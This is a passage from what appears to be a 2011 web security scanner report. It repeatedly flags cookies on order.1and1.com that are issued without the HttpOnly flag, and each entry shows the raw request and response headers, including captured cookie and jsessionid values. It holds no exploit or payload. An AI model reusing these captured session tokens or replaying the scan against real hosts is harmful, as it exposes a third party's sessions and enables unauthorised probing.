Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:53:23 GMT; Path=/
ETag: 5e110134f5ab455c39b626b00d12c7cc
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 22277


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainPdr HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7a745aba1b129c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainPdr;jsessionid=C2F6A7CD01E75DD0403F9C07235AE750.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.33. http://order.1and1.com/xml/order/FeatureDomainPdr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:53:45 GMT; Path=/
ETag: 6aa33937828532fc07c39d975616575c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17619


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDreamweaver HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4cdcf90faf576c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDreamweaver;jsessionid=905B724B7FF56930CBD8DE2F89703E4D.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.35. http://order.1and1.com/xml/order/FeatureDreamweaver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:53:13 GMT; Path=/
ETag: fdc362967b2cad5fff34de328fac6f24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17794


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailEmail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:55 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6cf6138224e39000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailEmail;jsessionid=E834C95B148F9F61B3526FF29F3A0E98.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.37. http://order.1and1.com/xml/order/FeatureEmailEmail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:06 GMT; Path=/
ETag: 136bbfa68f79af72651dea01141eea2e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19149


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:31 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=xZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:55:38 GMT; Path=/
ETag: dce3cf5ad5748df30645181485283bac
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18392


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailVirusscan HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=548c6adb7fb0ec00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailVirusscan;jsessionid=C253A50FE167E9674ABDF45A2486EDEE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailWebmail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=ca8f83ac4f85c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailWebmail;jsessionid=05FB253BDCD8907CE3C9A9ACB3FB95CB.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:55:28 GMT; Path=/
ETag: 05d3a4641a7d28dc45df37f735a690a2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16786


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureFtpBackup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureFtpBackup HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:55 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3c09b335ce42b800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureFtpBackup;jsessionid=9E2BB933F823CE1707E9AAA0DB33A443.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
